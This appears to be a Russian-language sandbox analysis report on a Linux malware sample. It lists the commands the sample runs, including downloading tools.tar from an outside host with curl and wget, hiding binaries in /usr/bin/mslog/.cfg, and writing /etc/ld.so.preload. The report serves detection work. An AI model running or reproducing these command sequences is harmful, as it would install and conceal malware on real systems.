Техническая информация
Вредоносные функции:
Выполняет трассировку процессов:
- <SAMPLE>
Запускает процессы:
- curl -O ccbbmm.com/tools.tar
- pgrep -c rcu_tasked
- mkdir -p /usr/bin/mslog/.cfg/
- /usr/bin/dpkg --print-foreign-architectures
- mv player /usr/bin/
- tar xvf tools.tar
- chmod 777 /root/.cfg/rcu_tasked
- <SAMPLE_FULL_PATH> -c exec \x27<SAMPLE_FULL_PATH>\x27 \x22$@\x22 <SAMPLE_FULL_PATH>
- mv libextrasshd.so /usr/local/lib/
- wget ccbbmm.com/tools.tar
- <0x7b>
- mkdir -p /root/.cfg
- apt install wget -y
- chmod +x *
- cp -a /root/.cfg/dealer /usr/bin/mslog/.cfg/
- rm -rf /usr/bin/mslog/.cfg/pass*
- cp -a /root/.cfg/tools.tar /usr/bin/mslog/.cfg/
- cp -f /usr/bin/mslog/.cfg/* /root/.cfg/
- cp -a /root/.cfg/rcu_tasked /usr/bin/mslog/.cfg/
- apt install curl -y
- sleep 1
Завершает следующие процессы:
- <SAMPLE>
Выполняет операции с файловой системой:
Модифицирует права доступа к файлам:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Модифицирует владельца файлов:
- /var/cache/apt/archives/partial
- /var/lib/apt/lists/auxfiles
Создает папки:
- /root/.cfg
- /usr/bin/mslog
- /usr/bin/mslog/.cfg
Создает или модифицирует файлы:
- /etc/ld.so.preload
- /etc/resolv.conf
- /tmp/#130834 (deleted)
- /var/lib/dpkg/lock-frontend
- /var/lib/dpkg/lock
- /var/cache/apt/archives/lock
Сетевая активность:
Устанавливает соединение:
- 8.#.8.8:53
DNS ASK:
- cc##mm.com
Прочее:
Собирает информацию об ОС
Собирает информацию о CPU
